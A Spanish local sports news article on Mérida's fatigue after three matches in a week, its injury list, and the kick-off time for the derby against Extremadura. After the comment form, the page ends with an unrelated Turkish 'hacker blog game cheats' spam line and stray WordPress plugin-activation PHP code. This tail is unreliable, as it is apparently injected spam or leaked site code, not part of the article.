El Mérida necesita un descanso


La tensión que se vivió entre los banquillos del Mérida y del Don Benito en el túnel de vestuarios tras el choque del sábado evidenció que las declaraciones del viernes en sala de prensa fueron crudo postureo. Recuerden: que si el equipo está para un ritmo alto, que si no va a condicionar el físico para este partido, que si el equipo ya tendría que estar recuperado en tres días… Palabras. Porque tras el empate a cero del Vicente Sanz, Dani Mori se destapó: «La semana ha sido dura física y psicológicamente».

«Quiero felicitar Germán y a los fisios por su trabajo esta semana para que los jugadores llegaran enteros», continuó el entrenador del Mérida. «No era fácil afrontar tres partidos en siete días y había que hacer una gestión muy importante de esas piernas, trabajar psicológicamente con los futbolistas… Muchas veces ese trabajo no se ve y han estado increíbles».

Reconoció el propio Dani Mori que tanto David Rocha como José Gaspar llegaron al derbi «muy cansados», que Mario Robles «forzó para llegar» y que estas últimas semanas han sido «muy duras». «Ahora toca descansar, los chavales y yo también, porque no estamos acostumbrados a tantos partidos en un espacio corto de tiempo y ha sido todo muy intenso».

El club anunciará hoy una serie de promociones para el derbi ante el Extremadura, fijado para el domingo 7 a las 19.00

¿Le viene bien que no haya jornada el próximo fin de semana? «Sí». Así de escueto y directo respondió a la pregunta el técnico del Mérida, acostumbrado él a elaborar reflexiones más largas. «Podía divagar y contarte otra cosa, pero si te soy sincero, sí, nos viene muy bien parar porque necesitamos recuperar a gente». Gente como Felipe Alfonso, Tovar, Fraile o Robles. Porque a Héctor Camps aún le quedan un par semanas más de recuperación.

Felipe Alfonso se rompió ante el Villanovense y el 7 de marzo cumpliría ya seis semanas de baja. Jaume Tovar, que se rompió frente al Melilla, cumpliría un mes. Mario Robles jugó la última jornada con el tobillo inflamado tras un golpe frente al Villarrubia. Y Marc Fraile, que en principio no iba a ser baja, se cayó a última hora por la inflamación en una de sus rodillas, que nada tiene que ver con su antigua lesión. «Las pruebas descartaron una lesión grave y al tener solo líquido pensamos que podía llegar. Intentamos apurar, pero al final el médico recomendó descanso y no forzamos», ha desvelado Dani Mori.

Así que la plantilla está de descanso hasta mañana miércoles, aunque muchos jugadores están acudiendo al estadio para tratarse de sus respectivas dolencias. Y no habrá amistoso en el próximo fin de semana de parón porque, precisamente, lo que necesita el vestuario es descansar y recuperar para llegar con los máximos efectivos posibles al derbi ante el Extremadura.

Ya hay hora para el derbi

Ese partido, previsto para el domingo 7 de marzo en el Romano, se jugará a las 19.00 horas. Tan tarde para jugar sabiendo el resultado de sus rivales directos pero, sobre todo, tan tarde para no coincidir con el Atlético-Real Madrid fijado para las 16.15 horas. Porque pretende el club emeritense que el Romano presente un aspecto similar al del día frente al Badajoz, de ahí que no vaya a fijar Medio Día del club (y este era uno de los partidos señalados en rojo por la directiva emeritense) y hoy anuncien una serie de promociones para motivar aún más a los abonados y simpatizantes. Porque tanto para Extremadura como para Mérida, el próximo derbi es uno de los más vitales de los últimos años.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );